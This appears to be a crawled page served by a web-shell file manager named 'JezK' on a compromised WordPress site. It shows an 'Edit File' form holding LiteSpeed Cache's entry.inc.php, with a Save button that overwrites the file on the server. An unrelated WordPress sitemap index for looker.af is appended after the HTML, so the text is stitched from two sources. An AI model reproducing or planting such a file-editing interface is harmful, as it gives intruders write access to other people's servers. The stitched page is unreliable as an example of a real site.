
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: entry.inc.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * The registry for Third Party Plugins Integration files.
 *
 * This file is only used to include the integration files/classes.
 * This works as an entry point for the initial add_action for the
 * detect function.
 *
 * It is not required to add all integration files here, this just provides
 * a common place for plugin authors to append their file to.
 *
 * @package    LiteSpeed
 * @subpackage LiteSpeed_Cache/thirdparty
 */

defined(&#039;WPINC&#039;) || exit();

$third_cls = array(
	&#039;Aelia_CurrencySwitcher&#039;,
	&#039;Autoptimize&#039;,
	&#039;Avada&#039;,
	&#039;BBPress&#039;,
	&#039;Beaver_Builder&#039;,
	&#039;Caldera_Forms&#039;,
	&#039;Divi_Theme_Builder&#039;,
	&#039;Facetwp&#039;,
	&#039;LiteSpeed_Check&#039;,
	&#039;Theme_My_Login&#039;,
	&#039;User_Switching&#039;,
	&#039;WCML&#039;,
	&#039;WooCommerce&#039;,
	&#039;WC_PDF_Product_Vouchers&#039;,
	&#039;Woo_Paypal&#039;,
	&#039;Wp_Polls&#039;,
	&#039;WP_PostRatings&#039;,
	&#039;Wpdiscuz&#039;,
	&#039;WPLister&#039;,
	&#039;WPML&#039;,
	&#039;WpTouch&#039;,
	&#039;Yith_Wishlist&#039;,
);

foreach ($third_cls as $cls) {
	add_action(&#039;litespeed_load_thirdparty&#039;, &#039;LiteSpeed\Thirdparty\\&#039; . $cls . &#039;::detect&#039;);
}

// Preload needed for certain thirdparty
add_action(&#039;litespeed_init&#039;, &#039;LiteSpeed\Thirdparty\Divi_Theme_Builder::preload&#039;);
add_action(&#039;litespeed_init&#039;, &#039;LiteSpeed\Thirdparty\WooCommerce::preload&#039;);
add_action(&#039;litespeed_init&#039;, &#039;LiteSpeed\Thirdparty\NextGenGallery::preload&#039;);
add_action(&#039;litespeed_init&#039;, &#039;LiteSpeed\Thirdparty\AMP::preload&#039;);
add_action(&#039;litespeed_init&#039;, &#039;LiteSpeed\Thirdparty\Elementor::preload&#039;);
add_action(&#039;litespeed_init&#039;, &#039;LiteSpeed\Thirdparty\Gravity_Forms::preload&#039;);
add_action(&#039;litespeed_init&#039;, &#039;LiteSpeed\Thirdparty\Perfmatters::preload&#039;);
add_action(&#039;litespeed_init&#039;, &#039;LiteSpeed\Thirdparty\Rank_Math::preload&#039;);
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
